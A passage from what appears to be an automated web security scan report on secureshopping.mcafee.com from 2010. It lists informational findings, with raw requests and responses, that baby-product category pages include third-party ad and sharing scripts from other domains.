Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:40 GMT
Content-Length: 61431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Toddler Bed at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.76. http://secureshopping.mcafee.com/browse/baby/furniture/toy-chests/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/toy-chests/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/furniture/toy-chests/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:41 GMT
Content-Length: 63307

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Toy Chests at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.77. http://secureshopping.mcafee.com/browse/baby/health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:42 GMT
Content-Length: 61864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Health at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.78. http://secureshopping.mcafee.com/browse/baby/health/brushes-combs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/brushes-combs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/brushes-combs/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:43 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:43 GMT
Content-Length: 56645

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Brushes & Combs at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.79. http://secureshopping.mcafee.com/browse/baby/health/diaper-rash-ointment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/diaper-rash-ointment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/diaper-rash-ointment/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:48 GMT
Content-Length: 55608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Diaper Rash Ointment at McAfee Secure Shopping - Search, Discove
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.80. http://secureshopping.mcafee.com/browse/baby/health/pacifiers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/pacifiers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/pacifiers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:49 GMT
Content-Length: 55750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Pacifiers at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.81. http://secureshopping.mcafee.com/browse/baby/health/teethers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/teethers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/teethers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:52 GMT
Content-Length: 56085

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Teethers at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.82. http://secureshopping.mcafee.com/browse/baby/health/teething-relief/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/teething-relief/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/teething-relief/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:53 GMT
Content-Length: 57716

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Teething Relief at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.83. http://secureshopping.mcafee.com/browse/baby/health/thermometers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/thermometers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/thermometers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:55 GMT
Content-Length: 60857

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Thermometers at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.84. http://secureshopping.mcafee.com/browse/baby/health/toilet-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/health/toilet-training/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/health/toilet-training/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:56 GMT
Content-Length: 69840

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

